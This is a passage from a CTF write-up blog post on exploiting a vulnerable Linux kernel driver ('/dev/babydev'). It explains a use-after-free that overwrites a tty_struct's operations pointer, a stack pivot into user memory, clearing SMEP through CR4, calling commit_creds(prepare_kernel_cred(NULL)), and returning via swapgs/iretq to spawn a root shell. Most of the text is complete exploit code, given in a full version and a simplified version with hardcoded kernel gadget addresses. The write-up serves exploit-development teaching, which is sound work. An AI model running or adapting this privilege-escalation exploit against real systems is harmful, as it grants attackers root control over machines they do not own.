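.text:FFFFFFFF814DC0C3 call qword ptr [rax+38h]

When control reaches this point, %rax is the only register the user controls (it holds the base address of fake_tty_operations), so we try the following gadget to pivot %rsp into user space:

0xffffffff8100008a : xchg eax, esp ; ret

Note: xchg eax, esp clears the upper halves of both registers. After it executes, the upper four bytes of %rsp are 0, so %rsp points into user space. We can claim that memory with mmap and place the ROP chain there.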
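The address arithmetic behind the pivot is small enough to check by hand. The sketch below computes the value %rsp takes after the gadget and the page-aligned base to pass to mmap; the function names and the 4 KiB page size are assumptions for this example.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE_ASSUMED 0x1000ULL   /* assumption: 4 KiB pages */

/* Value of rsp right after `xchg eax, esp` when rax held `rax`. */
uint64_t rsp_after_xchg(uint64_t rax)
{
    /* A 32-bit register write zero-extends into the full 64-bit register. */
    return rax & 0xffffffffULL;
}

/* Page-aligned base to hand to mmap so the new rsp lies inside the mapping. */
uint64_t fake_stack_base(uint64_t rax)
{
    uint64_t rsp = rsp_after_xchg(rax);
    uint64_t base = rsp & ~(PAGE_SIZE_ASSUMED - 1);

    assert(base <= rsp && rsp - base < PAGE_SIZE_ASSUMED);
    return base;
}
```

For a user-space table at the illustrative address 0x00007ffd12345678, the new %rsp is 0x12345678 and the mapping has to start at or below 0x12345000. Since the table is an array of 8-byte values, the resulting stack pointer stays 8-byte aligned.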

Here is the part of the code that hijacks the stack pointer:

int fd1 = open("/dev/babydev", O_RDWR);
int fd2 = open("/dev/babydev", O_RDWR);
ioctl(fd1, 65537, 0x2e0);

close(fd1);

// allocate a tty_struct
int master_fd = open("/dev/ptmx", O_RDWR);

// build a fake tty_operations
u_int64_t fake_tty_ops[] = {
    0, 0, 0, 0, 0, 0, 0,
    xchg_eax_esp_addr, // int  (*write)(struct tty_struct*, const unsigned char *, int)
};
printf("[+] fake_tty_ops constructed\n");

u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);
printf("[+] hijacked_stack addr: %p\n", (char*)hijacked_stack_addr);

char* fake_stack = NULL;
if ((fake_stack = mmap(
    (char*)(hijacked_stack_addr & (~0xfff)),    // addr, page-aligned
    0x1000,                                     // length
    PROT_READ | PROT_WRITE,                     // prot
    MAP_PRIVATE | MAP_ANONYMOUS,                // flags
    -1,                                         // fd
    0)                                          // offset
    ) == MAP_FAILED)  
    perror("mmap");

// touch the page up front so it is already mapped while debugging
fake_stack[0] = 0;
printf("[+]     fake_stack addr: %p\n", fake_stack);

// read the head of tty_struct, up to and including the ops pointer
int ops_ptr_offset = 4 + 4 + 8 + 8;
char overwrite_mem[ops_ptr_offset + 8];
char** ops_ptr_addr = (char**)(overwrite_mem + ops_ptr_offset);

read(fd2, overwrite_mem, sizeof(overwrite_mem));
printf("[+] origin ops ptr addr: %p\n", *ops_ptr_addr);

// patch the ops pointer and write the head of tty_struct back
*ops_ptr_addr = (char*)fake_tty_ops;
write(fd2, overwrite_mem, sizeof(overwrite_mem));
printf("[+] hacked ops ptr addr: %p\n", *ops_ptr_addr);

// trigger tty_write
// note: the buf pointer passed to write must be valid, otherwise it returns EFAULT early
char buf[8] = {0};
write(master_fd, buf, sizeof(buf));

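At this point the stack pointer has been successfully hijacked into user space.

4.2) Disabling SMEP + ret2usr privilege escalation

With the stack pointer hijacked we can now attempt privilege escalation. Normally the following code has to run in the kernel to escalate:

struct cred * root_cred = prepare_kernel_cred(NULL);
commit_creds(root_cred);

prepare_kernel_cred builds a cred structure from the task_struct pointer it is given. Note that when the pointer is NULL, as it is here, the returned cred is based on init_cred, whose uid, gid, and so on are all root.

commit_creds installs the cred it is given as the current process's cred. If we install a root-level cred on the current process, the privilege escalation is done.

To keep the exploit simple, we can disable SMEP first and then jump into user code that runs the precompiled escalation routine directly.

The SMEP flag lives in the CR4 register, so we can disable SMEP by rewriting CR4 and then escalate.

First, look at the current value of the cr4 register.

After that, we only need to overwrite cr4 with 0x6f0, a value in which the SMEP bit (bit 20) is clear.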
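The relationship between a CR4 value and the SMEP bit can be sketched with a one-line mask. The starting value 0x1006f0 used in the note below is a hypothetical example, not a reading taken from this challenge, and the helper name clear_smep is made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)   /* Supervisor Mode Execution Prevention */

/* Return `cr4` with the SMEP bit cleared and every other bit unchanged. */
uint64_t clear_smep(uint64_t cr4)
{
    uint64_t out = cr4 & ~CR4_SMEP;

    assert((out & CR4_SMEP) == 0);
    return out;
}
```

If the register held 0x1006f0, clearing bit 20 would give 0x6f0, the constant used in the ROP chain. Computing the value from the observed CR4 rather than hardcoding it keeps the other feature bits as the kernel set them.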

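4.3) Returning to user mode + getting a shell

Once the current process has been escalated, what remains is to return to user mode and start a new shell.

Some readers may ask: since kernel control flow is already hijacked, why not start the shell directly? Why return to user mode at all?

My understanding is that hijacking kernel control flow disturbs the kernel's normal execution logic, so the kernel is less robust and even mildly sensitive operations may crash it. The safest option is to go back to the more stable user mode, and a user-mode program running as root can do what kernel privilege would let us do anyway.

Another important reason is that, in general, building purpose-specific code in user space is far simpler than doing so in kernel space.

How do we return from kernel mode to user mode? Start from the syscall entry code and look at this part first: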

ENTRY(entry_SYSCALL_64)
  SWAPGS_UNSAFE_STACK
GLOBAL(entry_SYSCALL_64_after_swapgs)
  movq  %rsp, PER_CPU_VAR(rsp_scratch)
  movq  PER_CPU_VAR(cpu_current_top_of_stack), %rsp

  /* Construct struct pt_regs on stack */
  pushq  $__USER_DS      /* pt_regs->ss */
  pushq  PER_CPU_VAR(rsp_scratch)  /* pt_regs->sp */

  ENABLE_INTERRUPTS(CLBR_NONE)
  pushq  %r11        /* pt_regs->flags */
  pushq  $__USER_CS      /* pt_regs->cs */
  pushq  %rcx        /* pt_regs->ip */
  pushq  %rax        /* pt_regs->orig_ax */
  pushq  %rdi        /* pt_regs->di */
  pushq  %rsi        /* pt_regs->si */
  pushq  %rdx        /* pt_regs->dx */
  pushq  %rcx        /* pt_regs->cx */
  pushq  $-ENOSYS      /* pt_regs->ax */
  pushq  %r8        /* pt_regs->r8 */
  pushq  %r9        /* pt_regs->r9 */
  pushq  %r10        /* pt_regs->r10 */
  pushq  %r11        /* pt_regs->r11 */
  sub  $(6*8), %rsp      /* pt_regs->bp, bx, r12-15 not saved */

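As shown, once control enters the entry point it immediately executes swapgs, switching the GS register to the kernel GS. It then switches the stack pointer to the kernel stack and builds a struct pt_regs on it.

The structure is declared as follows: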

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
  unsigned long r15;
  unsigned long r14;
  unsigned long r13;
  unsigned long r12;
  unsigned long rbp;
  unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
  unsigned long r11;
  unsigned long r10;
  unsigned long r9;
  unsigned long r8;
  unsigned long rax;
  unsigned long rcx;
  unsigned long rdx;
  unsigned long rsi;
  unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
  unsigned long orig_rax;
/* Return frame for iretq */
  unsigned long rip;
  unsigned long cs;
  unsigned long eflags;
  unsigned long rsp;
  unsigned long ss;
/* top of stack page */
};

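Together with dynamic debugging, this shows that the five values rip, cs, eflags, rsp, and ss at the end of pt_regs are the first to be pushed on entry, before any general-purpose register is saved.

The same file also contains the following snippet: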

opportunistic_sysret_failed:
  SWAPGS
  jmp  restore_c_regs_and_iret
  
[...]

/*
 * At this label, code paths which return to kernel and to user,
 * which come from interrupts/exception and from syscalls, merge.
 */
GLOBAL(restore_regs_and_iret)
  RESTORE_EXTRA_REGS
restore_c_regs_and_iret:
  RESTORE_C_REGS
  REMOVE_PT_GPREGS_FROM_STACK 8
  INTERRUPT_RETURN

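From the analysis above it is easy to infer that returning from kernel mode to user mode takes two steps, in order:

- Execute swapgs once more, switching the GS register from the kernel gs back to the user gs
- Manually build on the stack the five register values that iret needs, then execute iret.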
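The two steps above translate into eight quadwords at the tail of the ROP chain. The sketch below lays them out with a small helper. The struct iret_frame and append_return_to_user are hypothetical names, the gadget addresses are supplied by the caller, and the swapgs gadget is assumed to be followed by a pop rbp, as in this writeup.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The five quadwords iretq pops, lowest address first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/*
 * Append "swapgs; pop rbp; ret", its dummy value, the iretq gadget, and the
 * iret frame to `chain` starting at index `idx`. Returns the next free index.
 */
size_t append_return_to_user(uint64_t *chain, size_t idx, size_t cap,
                             uint64_t swapgs_pop_rbp, uint64_t iretq,
                             const struct iret_frame *f)
{
    assert(chain != NULL && f != NULL && idx + 8 <= cap);
    chain[idx++] = swapgs_pop_rbp;   /* back to the user GS base */
    chain[idx++] = 0;                /* consumed by pop rbp */
    chain[idx++] = iretq;
    chain[idx++] = f->rip;           /* where user mode resumes */
    chain[idx++] = f->cs;
    chain[idx++] = f->rflags;
    chain[idx++] = f->rsp;
    chain[idx++] = f->ss;
    return idx;
}
```

The frame values are the ones saved from user mode before triggering the bug, with rip pointing at the function that spawns the shell.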

The resulting code, in part, is:

void get_shell() {
    printf("[+] got shell, welcome %s\n", (getuid() ? "user" : "root"));
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf; pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();
    printf(
        "[+] iret data saved.\n"
        "    user_cs: %ld\n"
        "    user_eflags: %ld\n"
        "    user_rsp: %p\n"
        "    user_ss: %ld\n",
        user_cs, user_eflags, (char*)user_rsp, user_ss
    );
    [...]
    u_int64_t* hijacked_stack_ptr = (u_int64_t*)hijacked_stack_addr;
    int idx = 0;
    hijacked_stack_ptr[idx++] = pop_rdi_addr;              // pop rdi; ret
    hijacked_stack_ptr[idx++] = 0x6f0;
    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  // mov cr4, rdi; pop rbp; ret;
    hijacked_stack_ptr[idx++] = 0;                         // dummy
    hijacked_stack_ptr[idx++] = (u_int64_t)set_root_cred;
    // newly added ROP chain entries
    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;
    hijacked_stack_ptr[idx++] = 0;                          // dummy
    hijacked_stack_ptr[idx++] = iretq_addr;
    hijacked_stack_ptr[idx++] = (u_int64_t)get_shell;       // iret_data.rip
    hijacked_stack_ptr[idx++] = user_cs;
    hijacked_stack_ptr[idx++] = user_eflags;
    hijacked_stack_ptr[idx++] = user_rsp;
    hijacked_stack_ptr[idx++] = user_ss;
    [...]
}

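4.4) ROP pitfalls

In ordinary userland exploitation we never have to think about page faults; they are an irrelevant detail. In kernel exploitation, however, a page fault is often fatal (recoverable or not, so even an ordinary demand-paging fault counts) and will very likely lead straight to a double fault that reboots the kernel.

When building a ROP chain, therefore, avoid having the kernel directly reference memory pages that have not been faulted in yet.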
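One way to follow this advice is to make sure every page of the user-space region is resident before the kernel ever touches it. The following is a minimal sketch of that idea using MAP_POPULATE plus an explicit write to every byte; the helper name alloc_prefaulted is an assumption, and it lets the kernel choose the address, whereas the exploit needs a fixed one.

```c
#define _GNU_SOURCE   /* MAP_ANONYMOUS, MAP_POPULATE */
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/*
 * Map `len` bytes of anonymous memory and make sure every page is resident
 * before kernel-side code touches it. Returns NULL on failure.
 */
void *alloc_prefaulted(size_t len)
{
    assert(len > 0);
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    /* Also write every byte by hand, in case MAP_POPULATE was not honoured. */
    memset(p, 0, len);
    return p;
}
```

For the fake stack in this writeup the same flags would be combined with a fixed address. Pages below the initial stack pointer matter too, because functions called from the chain push onto the fake stack.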

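Another issue is single-stepping. While debugging a kernel ROP chain, single-stepping sometimes blows up the kernel outright, whereas setting a breakpoint at the same location first and running to it works fine. As for how best to debug this... opinions will differ (lol).

4.5) Full exploit

The full exploit is shown below: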

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define xchg_eax_esp_addr           0xffffffff8100008a
#define prepare_kernel_cred_addr    0xffffffff810a1810
#define commit_creds_addr           0xffffffff810a1420
#define pop_rdi_addr                0xffffffff810d238d
#define mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80
#define swapgs_pop_rbp_addr         0xffffffff81063694          
#define iretq_addr                  0xffffffff814e35ef

void set_root_cred(){
    void* (*prepare_kernel_cred)(void*) = (void* (*)(void*))prepare_kernel_cred_addr;
    void (*commit_creds)(void*) = (void (*)(void*))commit_creds_addr;

    void * root_cred = prepare_kernel_cred(NULL);
    commit_creds(root_cred);
}

void get_shell() {
    printf("[+] got shell, welcome %s\n", (getuid() ? "user" : "root"));
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf; pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();
    printf(
        "[+] iret data saved.\n"
        "    user_cs: %ld\n"
        "    user_eflags: %ld\n"
        "    user_rsp: %p\n"
        "    user_ss: %ld\n",
        user_cs, user_eflags, (char*)user_rsp, user_ss
    );

    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 65537, 0x2e0);

    close(fd1);

    // allocate a tty_struct
    int master_fd = open("/dev/ptmx", O_RDWR);

    // build a fake tty_operations
    u_int64_t fake_tty_ops[] = {
        0, 0, 0, 0, 0, 0, 0,
        xchg_eax_esp_addr, // int  (*write)(struct tty_struct*, const unsigned char *, int)
    };
    printf("[+] fake_tty_ops constructed\n");

    u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);
    printf("[+] hijacked_stack addr: %p\n", (char*)hijacked_stack_addr);

    char* fake_stack = NULL;
    if ((fake_stack = mmap(
            (char*)((hijacked_stack_addr & (~0xffff))),  // addr, page-aligned (rounded down to 64 KiB)
            0x10000,                                     // length
            PROT_READ | PROT_WRITE,                     // prot
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,    // flags
            -1,                                         // fd
            0)                                          // offset
        ) == MAP_FAILED)  
        perror("mmap");
    
    printf("[+]     fake_stack addr: %p\n", fake_stack);

    u_int64_t* hijacked_stack_ptr = (u_int64_t*)hijacked_stack_addr;
    int idx = 0;
    hijacked_stack_ptr[idx++] = pop_rdi_addr;              // pop rdi; ret
    hijacked_stack_ptr[idx++] = 0x6f0;
    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  // mov cr4, rdi; pop rbp; ret;
    hijacked_stack_ptr[idx++] = 0;                         // dummy
    hijacked_stack_ptr[idx++] = (u_int64_t)set_root_cred;
    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;
    hijacked_stack_ptr[idx++] = 0;                          // dummy
    hijacked_stack_ptr[idx++] = iretq_addr;
    hijacked_stack_ptr[idx++] = (u_int64_t)get_shell;       // iret_data.rip
    hijacked_stack_ptr[idx++] = user_cs;
    hijacked_stack_ptr[idx++] = user_eflags;
    hijacked_stack_ptr[idx++] = user_rsp;
    hijacked_stack_ptr[idx++] = user_ss;

    printf("[+] privilege escape ROP prepared\n");

    // read the head of tty_struct, up to and including the ops pointer
    int ops_ptr_offset = 4 + 4 + 8 + 8;
    char overwrite_mem[ops_ptr_offset + 8];
    char** ops_ptr_addr = (char**)(overwrite_mem + ops_ptr_offset);

    read(fd2, overwrite_mem, sizeof(overwrite_mem));
    printf("[+] origin ops ptr addr: %p\n", *ops_ptr_addr);

    // patch the ops pointer and write the head of tty_struct back
    *ops_ptr_addr = (char*)fake_tty_ops;
    write(fd2, overwrite_mem, sizeof(overwrite_mem));
    printf("[+] hacked ops ptr addr: %p\n", *ops_ptr_addr);
    
    // trigger tty_write
    // note: the buf pointer passed to write must be valid, otherwise it returns EFAULT early
    char buf[8] = {0};
    write(master_fd, buf, sizeof(buf));

    return 0;
}

Result of running it:

Below is a simplified version of the exploit:

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define xchg_eax_esp_addr           0xffffffff8100008a
#define prepare_kernel_cred_addr    0xffffffff810a1810
#define commit_creds_addr           0xffffffff810a1420
#define pop_rdi_addr                0xffffffff810d238d
#define mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80
#define swapgs_pop_rbp_addr         0xffffffff81063694          
#define iretq_addr                  0xffffffff814e35ef

void set_root_cred(){
    void* (*prepare_kernel_cred)(void*) = (void* (*)(void*))prepare_kernel_cred_addr;
    void (*commit_creds)(void*) = (void (*)(void*))commit_creds_addr;
    commit_creds(prepare_kernel_cred(NULL));
}

void get_shell() {
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf; pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();

    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 65537, 0x2e0);
    close(fd1);

    int master_fd = open("/dev/ptmx", O_RDWR);

    u_int64_t fake_tty_ops[] = {
        0, 0, 0, 0, 0, 0, 0,
        xchg_eax_esp_addr
    };

    u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);

    char* fake_stack = mmap(
            (void*)(hijacked_stack_addr & (~0xffff)),
            0x10000,
            PROT_READ | PROT_WRITE,                    
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            -1,
            0);
    
    u_int64_t rop_chain_mem[] = {
        pop_rdi_addr, 0x6f0, 
        mov_cr4_rdi_pop_rbp_addr, 0, (u_int64_t)set_root_cred,
        swapgs_pop_rbp_addr, 0, 
        iretq_addr, (u_int64_t)get_shell, user_cs, user_eflags, user_rsp, user_ss
    };
    memcpy((void*)hijacked_stack_addr, rop_chain_mem, sizeof(rop_chain_mem));
    
    int ops_ptr_offset = 4 + 4 + 8 + 8;
    char overwrite_mem[ops_ptr_offset + 8];
    char** ops_ptr_addr = (char**)(overwrite_mem + ops_ptr_offset);

    read(fd2, overwrite_mem, sizeof(overwrite_mem));
    *ops_ptr_addr = (char*)fake_tty_ops;
    write(fd2, overwrite_mem, sizeof(overwrite_mem));

    char buf[8] = {0};
    write(master_fd, buf, sizeof(buf));

    return 0;
}

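5. References

Copyright notice: unless otherwise stated, all articles on this blog are copyrighted by the author. Please credit the source when reposting!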